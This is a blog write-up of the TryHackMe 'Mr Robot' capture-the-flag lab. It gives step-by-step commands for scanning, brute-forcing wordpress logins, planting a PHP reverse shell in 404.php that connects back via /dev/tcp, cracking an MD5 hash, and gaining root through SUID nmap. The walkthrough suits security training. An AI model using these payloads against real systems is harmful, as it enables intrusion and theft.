Open in app

Sign in

Write

Sign in

TryHackMe: Mr Robot CTF

ratiros01
5 min readJun 17, 2020

--

  1. Port scan
nmap -Pn <ip>

2. All scan

nmap -A -p 22,80,443 <ip>

3. Vulnerability scan

nmap --script vuln -p 22,80,443 <ip>

This is a wordpress site. There’s a robots.txt file

4. Access HTTP site

There’re commands that I can try.

prepare
fsociety
inform
question
wakeup
join

Seems like these commands are just for fun.

Viewing source of index page is not useful.

Inspecting element is not useful neither.

5. Access robots.txt

Download fsocity.dic

wget http://<ip>/fsocity.diccat fsocity.dic

This file may contain useful password.

Count lines of the file

wc -l fsocity.dic

Sort the file and remove duplication

sort fsocity.dic | uniq > sort_fsocity.dicwc -l sort_fsocity.dic

Access http://<ip>/key-1-of-3.txt

6. Nikto scan

nikto -h http://<ip>/ -nossl

7.Directory scan

dirb http://<ip>

Seems like it’s a wordpress site. Access one of scanned directories.

http://<ip>/0/

View source, nothing useful.

8. Wordpress scan

wpscan --url http://<ip>/0/ -et -ep -eu

Failed

Add another flag as suggestion

wpscan --url http://<ip>/0/ --wp-content-dir -et -ep -eu

There’re 2 users: mich05654 and elliot.

9. Bruteforcing wordpress

wpscan --url http://<ip>/0/ --wp-content-dir -eu -P fsocity.dic

Access http://<ip>/wp-login.php

Username -> mich05654:Dylan_2791

Can’t do anything with this user.

Let’s try elliot:ER28–0652

On Dashboard -> Users. Elliot is an administrator.

Let’s get the reverse shell

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/<ip>/1234 0>&1'");
?>

Go to appearance -> editor -> Put the code in 404.php

Create listener

nc -lvp 1234

Access 404.php

Now I have a shell.

cd /home/lscat key-2-of-3.txt

I don’t have permission to key2.

Read another file. It’s robot’s credential.

cat password.raw-md5

Crack with hashcat

hashcat -m 0 c3fcd3d76192e4007dfb496cca67e13b ~/Desktop/rockyou.txthashcat -m 0 c3fcd3d76192e4007dfb496cca67e13b ~/Desktop/rockyou.txt --show

Change to robot

su robot

Failed. I need TTY shell

Import TTY shell

python -c 'import pty;pty.spawn("/bin/bash");'

Change to robot

su robot

Read key2

cat key-2-of-3.txt
1

Let’s do privilege escalation

Check if robot can run sudo.

sudo -l

I can’t run sudo.

Looking for SUID

find / -perm -u=s -type f 2>/dev/null

It’ nmap!!!

nmap --interactive!shid

Now I’m root.

cd /rootcat key-3-of-3.txt

--

--

ratiros01
ratiros01

Written by ratiros01

424 Followers
13 Following

OSCP

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams